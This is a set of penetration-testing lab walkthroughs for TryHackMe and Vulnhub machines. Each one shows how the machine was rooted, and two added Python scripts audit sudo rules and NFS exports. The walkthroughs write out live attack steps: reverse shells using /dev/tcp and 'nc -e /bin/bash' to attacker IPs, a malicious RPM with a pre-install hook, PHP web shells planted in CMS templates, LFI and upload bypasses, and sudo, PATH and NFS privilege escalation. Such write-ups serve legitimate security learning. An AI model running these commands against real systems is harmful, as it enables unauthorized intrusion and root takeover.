Daily Bugle – TryHackMe Machine Writeup

Today, we will root the Daily Bugle Machine from TryHackMe.

After deploying the machine, we are greeted with the first question.

Access the Server, Who robbed the bank?

Pretty straightforward.

The answer is there.

The next question tells us the CMS is Joomla. We need to find its version.

Upon a Google search, I ended up here.

So, we can read the version by visiting

http://10.10.249.33/administrator/manifests/files/joomla.xml

We got the version too.

This version of Joomla has an SQL injection vulnerability. Let's look it up.

https://www.exploit-db.com/exploits/42033

We could use sqlmap, but a simpler Python script is available.

https://github.com/XiphosResearch/exploits/tree/master/Joomblah

Let's run this against our target.

[email protected]:~/ex$ python joomblah.py http://10.10.249.33

We got the admin password hashes!

Let's crack this with John.

[email protected]:/home/kali/ex# john -w=/usr/share/wordlists/rockyou.txt jonah.txt -form=bcrypt

It took 40 minutes to get the hash cracked in my VM.

Let's log in now.

http://10.10.249.33/administrator/

With the password we just found.

Once we are inside, go to Templates > Templates and click the name of the active template.

Select the index.php file and paste in the PHP reverse shell script. Download the file from the link below and update it with our IP.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Now listen on port 4444 on our machine and load the main page of the site.

[email protected]:~/ex$ nc -nlvp 4444
listening on [any] 4444 ...

We got a reverse shell!

Let's find the user flag now. First, find the users.

sh-4.2$ cat /etc/passwd

Let's have a look at jjameson's home directory.

But we don't have permission for that.

Let's find some other way.

Have a look at the /var/www/html/configuration.php file.

Let's try the password from that file for the user.

bash-4.2$ su jjameson
su jjameson
Password: nv5uz9r3ZEDzVjNu

[[email protected] html]$ 

Success!

The user can run yum without a password on the machine.

We can read the user flag now.

We can install any package with yum as root. Have a look at the following page.

https://gtfobins.github.io/gtfobins/yum/

Let's create a specially crafted RPM package and install it on the target.

Let's follow this guide for the process.

https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2

[email protected]:/home/kali/ex# git clone https://github.com/jordansissel/fpm
[email protected]:/home/kali/ex/fpm# gem install fpm
[email protected]:/home/kali/ex/fpm# apt-get install rpm

Now create a file named root.sh for the reverse shell.

#! /bin/bash
bash -i >& /dev/tcp/10.9.42.115/9999 0>&1

Now create the RPM package.

[email protected]:/home/kali/ex# fpm -n root -s dir -t rpm -a all --before-install root.sh /home/kali/ex

Now, let's transfer the file to the target machine and install the package.

[email protected]:/home/kali/ex# python -m SimpleHTTPServer 222

and on the target,

[[email protected] ~]$ wget http://10.9.42.115:222/root-1.0-1.noarch.rpm

Listen for a connection on port 9999 on our attacker machine.

[email protected]:/home/kali/ex# nc -nlvp 9999
listening on [any] 9999 ...

and install the package on the target.

[[email protected] ~]$ sudo yum localinstall -y root-1.0-1.noarch.rpm

We got the root shell!

Let's read the root flag now.

Done!!

Lin.Security: 1 Vulnhub Machine Walkthrough

Today, we will root the Lin.Security:1 machine from Vulnhub. This is a simple and straightforward boot2root machine.

Let's start by finding the IP.

[email protected]:~# nmap -sS 192.168.18.0/24

Got the IP and the open ports.

NFS is running on port 2019. Let's enumerate it.

[email protected]:~# nmap -sV --script=nfs-* 192.168.18.102

We can mount /home/peter on our machine.

[email protected]:/mnt# mkdir lin
[email protected]:/mnt# mount 192.168.18.102:/home/peter /mnt/lin
[email protected]:/mnt# ls -la

To log in to the machine, we can place our SSH public key in the .ssh directory.

(Refer to this article to learn how to create an SSH key.)

Copy our public key (id_rsa.pub) to the /tmp directory.

[email protected]:/mnt# cd /root/.ssh
[email protected]:~/.ssh# ls -la
total 20
drw-------  2 root root 4096 Jul  2 07:25 .
drwx------ 35 root root 4096 Aug 17 07:17 ..
-rw-------  1 root root 2590 Aug 12 08:35 id_rsa
-rw-r--r--  1 root root  563 Aug 12 08:35 id_rsa.pub
-rw-r--r--  1 root root 3322 Aug 13 06:47 known_hosts
[email protected]:~/.ssh# cp id_rsa.pub /tmp

Make a directory named .ssh in the directory we just mounted.

[email protected]:/mnt/lin# mkdir .ssh
mkdir: cannot create directory ‘.ssh’: Permission denied

We don't have permission to create the directory.

Let's create a local user with uid 1001 to do this.

[email protected]:~# useradd -u 1001 peter

Now change the ownership of /tmp/id_rsa.pub to peter.

[email protected]:~/.ssh# cd /tmp
[email protected]:/tmp# chown peter:peter id_rsa.pub
[email protected]:/tmp# 

Let's copy the file to the mounted directory now. First switch to the user peter, then copy the file.

[email protected]:/mnt/lin# su peter
$ whoami
peter
$ mkdir .ssh
$ cd .ssh
$ cp /tmp/id_rsa.pub authorized_keys

We have copied our public key to /mnt/lin/.ssh/authorized_keys.

Now, let's try to log in as peter through SSH.

[email protected]:~# cd .ssh
[email protected]:~/.ssh# ssh peter@192.168.18.102

We are now logged in as peter. Let's see what we can do here with elevated privileges.

[email protected]:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User peter may run the following commands on linsecurity:
    (ALL) NOPASSWD: /usr/bin/strace

We can run /usr/bin/strace as root.

Can we escalate our privileges with this?

GTFOBins says yes!

Let's try.

[email protected]:~$ sudo strace -o /dev/null /bin/sh
# whoami
root

We got root!

This was a comparatively easy machine. Let's root another machine tomorrow!

PwnLab: init, Vulnhub Machine Walkthrough

Let's root the PwnLab: init machine from Vulnhub today.

Start by finding out the IP through nmap.

nmap -sn 192.168.18.0/24

We have the IP now: 192.168.18.100.

Time for a deeper scan.

nmap -p- -A -T5 -sV -O --script vuln  192.168.18.100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 08:35 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.100
Host is up (0.00097s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags: 
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.18.100
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.18.100:80/?page=login
|     Form id: user
|_    Form action: 
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /login.php: Possible admin folder
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_  /upload/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.0.1
|_http-server-header: Apache/2.4.10 (Debian)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.10: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3583   5.0     https://vulners.com/cve/CVE-2014-3583
|       CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
111/tcp   open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38626/tcp   status
|   100024  1          39233/udp6  status
|   100024  1          52116/udp   status
|_  100024  1          57067/tcp6  status
3306/tcp  open  mysql   MySQL (blocked - too many connection errors)
38626/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:CF:29:7D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.97 ms 192.168.18.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 372.01 seconds

We have a website running on the server. Let's have a look.

A login page. Let's try SQL injection.

Unfortunately it didn't work. But have a look at the login page URL.

http://192.168.18.100/?page=login

Is there an LFI?

I tried but couldn't find any. Then I came across this article.

https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/

Let's try this on config.php.

http://192.168.18.100/?page=php://filter/convert.base64-encode/resource=config

We got something in base64.

Let's decode this with https://www.base64decode.org/

Now we have the credentials to log in to the MySQL server.

Let's try to log in.

mysql -u root -h 192.168.56.101 -pH4u%QJ_H99

I got an error at first, but fixed the issue with a reboot of the VM.

Let's read the data now.

show databases;

Let's find the tables and the data inside them.

MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.005 sec)

Here we have 3 users. It looks like the passwords are base64 encoded. Let's decode kent's password.

It is JWzXuBJJNy.

Let's log in as kent.

Let's try to upload a PHP shell.

Let's try to send it as a JPG with Burp.

Change the filename to photo.gif, the content type to image/gif, and add GIF87a as the first line.

We can find our file's location in the response field in Burp.

Our file is uploaded, but we can't read it directly. Let's read index.php with the php://filter method used above.

Here, a 'lang' cookie is used to load the 'en.lang.php' file.

Let's try changing the value to something else.

In Firefox, go to Web Developer > Storage and click the + button at the top right to add a cookie.

Cookie name: lang and value: ../upload/3f0d7f3bc6046d5eb636569c8a24ab31.gif

And now:

We got the file included.

Now let's open a reverse shell with netcat. Enter this command in the page.

nc -nv 192.168.18.99 4444 -e /bin/bash

We got a connection.

Now we have the passwords for three users. Let's examine their home directories.

Nothing special here.

Mike's password doesn't work. Let's try kane.

There is a file owned by mike. Let's open it.

Ah, we couldn't read it. What kind of file is this?

An executable. Let's try running it.

[email protected]:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory

This executable tries to read msg.txt from mike's home directory. That means the cat it runs has access to mike's home directory while we don't. Right?

What about changing the PATH variable and running /bin/bash with the same privileges as cat? Let’s try.

[email protected]:~$ echo "/bin/bash" > /tmp/cat
echo "/bin/bash" > /tmp/cat
[email protected]:~$ chmod +x /tmp/cat
chmod +x /tmp/cat
[email protected]:~$ PATH=/tmp:$PATH
PATH=/tmp:$PATH

Now let's run the executable file.

We are mike now!

Let's have a look at mike's home directory.

There's a file called msg2root.

It sends a message to root, so like the previous file, this executable has access to root's folder too.

Let's try another method.

We are root.

Let's read the flag now. Before that, we need to copy the real cat binary over our /tmp/cat.

Cheers!

Mr Robot 1 Vulnhub Machine Walkthrough

Today we will root the Mr Robot 1 machine from Vulnhub.

As usual, first find the IP of the machine.

nmap -sn 192.168.18.0/24

Now let's do a scan on the machine.

nmap -sV -O -A -T5 192.168.18.96

There is a web server running on port 80. Let's have a look.

Cool. Let's do a directory scan with Gobuster.

[email protected]:~# gobuster dir -u 192.168.18.96 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt 

We have wp-content, wp-admin and wp-login on the server, so we can guess that a WordPress installation is there.

Before that, let's have a look at robots.txt.

This robots file blocks fsocity.dic and key-1-of-3.txt.

fsocity.dic is a wordlist. Let's save it so that we can use it for fuzzing later.

This is key-1-of-3. That means we need to find 2 more keys.

Now we need to find the username and password. Go to the login page and try the usual combinations.

Now let's try to find valid usernames from our .dic file using Burp Suite.

Capture the request and send it to Intruder.

Click Clear and select the username field as the position to insert the payload.

Now run this command to remove the duplicate lines in fsocity.dic:

sort fsocity.dic | uniq > test.txt

The original file is 6MB and our new file is just 94KB. Use this file as the payload list in Burp.

Now load the file and start the attack. The attack will be faster in paid versions of Burp Suite.

The usual response length is 4145 when the username is wrong, but when the username is elliot the response length is 4196. Let's try that in the browser.

The username elliot is right. Now we need to find the password using the same method.

Get the login request, send it to Intruder, and use the same file for fuzzing.

We got the password too. ER28-0652.

And we are logged in.

Now we need a reverse shell. Let's do that by editing a page template.

Visit the following page and select 404 Template.

http://192.168.18.96/wp-admin/theme-editor.php

This page is shown in case of a 404 error in this WordPress installation. If we add our backdoor script to this template and then load a non-existent page, we get a reverse shell. Paste the contents of the following file there.

http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

and update the IP and port with your attacker IP and listening port number.

Let's get a shell from this page: first listen on Kali with nc, then trigger the connection from the server.

nc -nlvp 4444

Visit any non-existent page on the site:

http://192.168.18.96/melbin.in

We got a shell.

Looking at the home folder of the user robot, we find a file named password.raw-md5.

We also have key 2 of 3 here, but we don't have read permission on it.

Let's open the password.raw-md5 file.

Let's copy the MD5 hash and search for it online.

https://md5.gromweb.com/?md5=c3fcd3d76192e4007dfb496cca67e13b

We have the password of robot. Let's change user to robot now. But we need to run that from a TTY shell. Use this command:

python -c 'import pty; pty.spawn("/bin/sh")'

nmap is on the machine; we can verify that with

which nmap

Now have a look at https://gtfobins.github.io/gtfobins/nmap/#sudo to learn how to do privilege escalation with nmap.

Let's try this.

We got root access now. Let's read the second flag.

What about the third flag?

It is here.

Let's read that too.

So, we have completed Mr. Robot 1.

Cheers!

Skytower 1 Vulnhub Machine Walkthrough

Today, let's work on the Skytower 1 Vulnhub machine.

Let's find the IP first.

[email protected]:~# nmap -sn 192.168.18.0/24
Nmap scan report for 192.168.18.94
Host is up (0.0086s latency).
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

So, the target IP is 192.168.18.94. Let's do a simple port scan.

[email protected]:~# nmap -O -sV 192.168.18.94

There is a web server running on port 80. Let's have a look.

A login page. Let's try SQL injection.

We can use Burp Suite for this. Download a list of payloads to test from here.

https://github.com/melbinkm/SQL-Injection-Payloads/blob/master/sqli_auth.list

Now let's capture the request in Burp.

Then right click and send it to Intruder.

Set the attack type to 'pitchfork' and make sure that the email and password fields are selected.

Now go to Payloads and load the payload list we downloaded for both the first and second payload sets.

And click Start Attack.

While the attack runs, we can notice that the response length of some requests is 231 and of others 1838. The ones with 1838 are the ones we want: they are successful logins.

Here let's try '-' as both the email and the password.

And we're in!

We have the SSH login credentials now. Let's try logging in.

It doesn't connect. But remember, there is a Squid proxy open on port 3128.

Let's try connecting through it.

Add the following line to /etc/proxychains.conf:

http 192.168.18.94 3128

Now, let's try connecting to the machine.

We logged in to the server and were logged out automatically. Let's try running a command upon login.

[email protected]:~# proxychains ssh -t [email protected] ls -la

OK, so our command is working, but we still get logged out. Let's try to get a reverse shell through this.

First check if netcat is present there.

Yes. Now let's spawn a reverse shell.

[email protected]:~# nc -nlvp 4444
listening on [any] 4444 ...

We have executed the command and got a reverse shell on our Kali machine.

We are in; now let's have a look at /etc/passwd.

There are two more users, sara and william.

Let's try to find the passwords of sara and william too and log in.

username: [email protected]
password: '-'

username: [email protected]
password: '-'

We got the password of sara. Let's try logging in.

[email protected]:~# proxychains ssh -t sara@192.168.18.94 nc 192.168.18.92 4444 -e /bin/bash

We got access to sara's account.

Run sudo -l to view sara's sudo permissions.

So, sara can run cat and ls on the /accounts/ directory with root permissions.

According to this page, https://superuser.com/questions/355029/how-to-automatically-run-commands-on-ssh-login

we can execute a script upon SSH login by placing it in the .bashrc file.

Let's have a look.

cat .bashrc

Let's try removing this and logging in again.

rm .bashrc

Logged in.

Now we can use sudo ls /accounts/ on the machine with root permissions.

What about sudo ls /accounts/../ ? Let's try.

Using this method we can traverse back to the /root directory and find a flag.txt file there.

Now use cat to read the file.

sudo cat /accounts/../root/flag.txt

We got the root password now. Let's become root using the su command.

We are root!
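The sudo rules used in these writeups share one pattern: Daily Bugle's yum, Lin.Security's strace, Mr Robot's nmap and Skytower's cat/ls on /accounts/* were each granted for one task, yet each reaches a root shell or any root-readable file. As an added example (not part of the original writeups), the script below parses sudo -l output and flags those patterns; the sample output is constructed from the rules seen above, and the set of shell-escape binaries is a hand-picked subset of what GTFOBins lists.

```python
"""Flag sudo rules that reach a root shell or any root-readable file.

Added example, not part of the original writeups. It parses what
`sudo -l` prints and reports binaries with a GTFOBins shell escape
(strace, yum, nmap), NOPASSWD grants, and file readers whose argument
ends in '*': sudo matches '*' with fnmatch(3), where the star also
matches '/', so '/accounts/../root/flag.txt' satisfies '/accounts/*'.
"""
import os
import re

# Hand-picked subset of the binaries GTFOBins lists under "sudo"; the
# three used on this page come first. Extend it from gtfobins.github.io.
SHELL_ESCAPES = {"strace", "yum", "nmap", "vi", "vim", "less", "more",
                 "find", "awk", "python", "perl", "bash", "sh"}
FILE_READERS = {"cat", "ls", "less", "more", "head", "tail"}

RUNAS_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<rest>.*)$")
TAGS_RE = re.compile(r"^(?P<tags>(?:[A-Z]+:\s*)+)(?P<rest>.*)$")

# Constructed sample in `sudo -l` format, combining the rules seen in the
# Lin.Security, Daily Bugle, Mr Robot and Skytower sections.
SAMPLE = r"""Matching Defaults entries for peter on linsecurity:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User peter may run the following commands on linsecurity:
    (ALL) NOPASSWD: /usr/bin/strace
    (ALL) NOPASSWD: /usr/bin/yum
    (root) /usr/bin/nmap
    (ALL) NOPASSWD: /bin/cat /accounts/*, /bin/ls /accounts/*
"""

def parse_rule_line(line):
    """Split one rule line into (runas, nopasswd, command) tuples.

    A line may carry several comma-separated commands; a later item may
    restate the runas spec, and tags carry over to following commands
    exactly as they do in sudoers.
    """
    rules = []
    runas, nopasswd = "?", False
    for item in line.split(","):
        item = item.strip()
        m = RUNAS_RE.match(item)
        if m:
            runas, item = m.group("runas").strip(), m.group("rest").strip()
        t = TAGS_RE.match(item)
        if t:
            nopasswd = "NOPASSWD:" in t.group("tags")
            item = t.group("rest").strip()
        if item:
            rules.append((runas, nopasswd, item))
    return rules

def parse_sudo_l(text):
    """Return every (runas, nopasswd, command) rule in `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if in_rules and line.strip():
            rules.extend(parse_rule_line(line))
    return rules

def assess(rule):
    """Return the problems with one rule; an empty list means none found."""
    runas, nopasswd, cmd = rule
    argv = cmd.split()
    binary = os.path.basename(argv[0])
    problems = []
    if cmd == "ALL":
        problems.append("unrestricted: any command as " + runas)
    if binary in SHELL_ESCAPES:
        problems.append(binary + " has a documented shell escape")
    if binary in FILE_READERS and any(a.endswith("*") for a in argv[1:]):
        problems.append(binary + " with a wildcard path: '..' escapes the directory")
    if problems and nopasswd:
        problems.append("NOPASSWD: no credential needed to use it")
    return problems

def audit(text):
    """Map each risky command to its problems; clean rules are omitted."""
    report = {}
    for rule in parse_sudo_l(text):
        problems = assess(rule)
        if problems:
            report[rule[2]] = problems
    return report

if __name__ == "__main__":
    for cmd, problems in audit(SAMPLE).items():
        print(cmd + ":", "; ".join(problems))
```

Run it over the real sudo -l output of every account on a host; anything it flags should be narrowed to fixed arguments or replaced by a small wrapper that does only the intended task.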

Hacklab Vulnix, Vulnhub Machine Walkthrough

Today we are working on the Vulnix machine from Vulnhub.

Let's find the IP first.

nmap -sN 192.168.18.92/24

We got the IP: 192.168.18.93.

Let's do a detailed scan now.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 04:47 EDT
Nmap scan report for 192.168.18.93
Host is up (0.0050s latency).
Not shown: 65518 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown: 
79/tcp    open  finger     Linux fingerd
110/tcp   open  pop3       Dovecot pop3d
|_sslv2-drown: 
111/tcp   open  rpcbind    2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      33365/udp6  mountd
|   100005  1,2,3      47947/tcp6  mountd
|   100005  1,2,3      56458/udp   mountd
|   100005  1,2,3      57756/tcp   mountd
|   100021  1,3,4      39547/udp   nlockmgr
|   100021  1,3,4      47952/tcp6  nlockmgr
|   100021  1,3,4      53508/udp6  nlockmgr
|   100021  1,3,4      53795/tcp   nlockmgr
|   100024  1          38357/udp   status
|   100024  1          39369/tcp   status
|   100024  1          48082/udp6  status
|   100024  1          57952/tcp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
143/tcp   open  imap       Dovecot imapd
512/tcp   open  exec       netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
993/tcp   open  ssl/imaps?
995/tcp   open  ssl/pop3s?
2049/tcp  open  nfs_acl    2-3 (RPC #100227)
39369/tcp open  status     1 (RPC #100024)
42985/tcp open  mountd     1-3 (RPC #100005)
48267/tcp open  mountd     1-3 (RPC #100005)
53795/tcp open  nlockmgr   1-4 (RPC #100021)
57756/tcp open  mountd     1-3 (RPC #100005)
MAC Address: 08:00:27:67:74:42 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   4.97 ms 192.168.18.93

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.55 seconds

finger is running on port 79. Let's do some user enumeration first.

We got a few users.

Let's try brute-forcing the logins.

Make a text file with the usernames.

Let's run medusa with rockyou.txt:

medusa -h 192.168.18.93 -U vulnix_users.txt -P rockyou.txt -e ns -f -M ssh > medusa.txt

Let's try to enumerate further while the brute forcing runs in the background.

From the detailed scan above, we can see that NFS is running on port 2049. Let's go deeper.

nmap -sV --script=nfs-* 192.168.18.93

We have an NFS share at /home/vulnix. Let's try to mount it on our machine.

But we don't have permission to open it.

Let's go back to our medusa run and check the results.

So, the password for the account user is letmein.

Let's try to log in to the machine.

Let's now check the /etc/passwd file and get the details of the vulnix user.

If we add this user to our system with the same uid, 2008, we can read the mounted directory. Right? Let's try.

useradd -u 2008 vulnix
su vulnix
cd /tmp/vulnix
ls -la

We got access to vulnix's home folder.

If we place our id_rsa.pub key in /mnt/vulnix/.ssh/authorized_keys, we can log in without a password.

Create a key, if you have not created one yet.

ssh-keygen -t rsa

Now copy the public key to /tmp and change its owner to vulnix.

Add the file as /mnt/vulnix/.ssh/authorized_keys.

Now we can log in as vulnix on the target machine without a password.

Let's see what we can do with this user.

sudo -l

We can edit the /etc/exports file as root without a password.

According to this article, https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ , the root_squash option in *(rw,root_squash) is what prevents file access as root. Since we have edit access to this file, we can change that.

Made the change and saved.

We need to restart NFS for the change to take effect; since we don't have root access, let's reboot the machine.

Now remount the share and copy our /bin/bash to the mounted directory.

[email protected]:/mnt/vulnix# cp /bin/bash .

The file is now in vulnix's home folder, owned by root. Let's try running it.

./bash
whoami
root
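Both NFS footholds on this page (peter's home on Lin.Security and vulnix's home here) work because the server trusts whatever uid the client presents, and the final step here works because root_squash was switched off. As an added example, not part of the original walkthrough, the script below parses /etc/exports and reports those conditions; the sample file is constructed, with only the share paths taken from the text.

```python
"""Audit /etc/exports for the NFS weaknesses used in the Lin.Security and
Vulnix writeups: shares open to every client, uid-based (AUTH_SYS) access
that any client can forge with `useradd -u <uid>`, and no_root_squash,
which lets a client's root leave root-owned files on the share.

Added example, not part of the original walkthroughs. The sample file is
constructed; only the share paths are taken from the text.
"""
import re

SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/home/vulnix    *(rw,root_squash)
/home/peter     192.168.18.0/24(rw,no_root_squash)
/srv/public     192.168.18.10(ro,all_squash,anonuid=65534,anongid=65534)
"""

# One client entry: a host, optionally followed by (opt,opt,...)
CLIENT_RE = re.compile(r"(?P<host>[^\s(]+)(?:\((?P<opts>[^)]*)\))?")

def parse_exports(text):
    """Return (path, host, option set) for every client of every export."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        clients = parts[1] if len(parts) > 1 else "*"  # bare path = everyone
        for m in CLIENT_RE.finditer(clients):
            opts = {o.strip() for o in (m.group("opts") or "").split(",") if o.strip()}
            entries.append((path, m.group("host"), opts))
    return entries

def assess_export(path, host, opts):
    """Return the problems with one export entry; [] means none found."""
    problems = []
    if host in ("*", "0.0.0.0/0"):
        problems.append("exported to any client; restrict to the hosts that need it")
    if "no_root_squash" in opts:
        problems.append("no_root_squash: a client's root can leave root-owned "
                        "(and setuid) files on the share")
    kerberos = any(o.startswith("sec=krb5") for o in opts)
    if "rw" in opts and "all_squash" not in opts and not kerberos:
        problems.append("AUTH_SYS trusts the client's uid: a forged uid owns the "
                        "share's files (the useradd -u trick)")
    if "rw" in opts and path.startswith("/home/"):
        problems.append("writable home directory: .ssh/authorized_keys can be "
                        "written from the client")
    return problems

def audit_exports(text):
    """Map (path, host) to its problems; clean entries map to []."""
    return {(path, host): assess_export(path, host, opts)
            for path, host, opts in parse_exports(text)}

if __name__ == "__main__":
    for (path, host), problems in audit_exports(SAMPLE_EXPORTS).items():
        print(path, host, "OK" if not problems else "")
        for p in problems:
            print("   -", p)
```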

So we got root access on Vulnix too. Next day, next machine!

SickOs: 1.2 Vulnhub Machine Walkthrough

Today we are playing with SickOs 1.2 from Vulnhub.

Get the IP first.

nmap -sP 192.168.18.0/24

The IP address is 192.168.18.90.

Let's do a detailed scan now.

[email protected]:~# nmap 192.168.18.90 -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.90
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
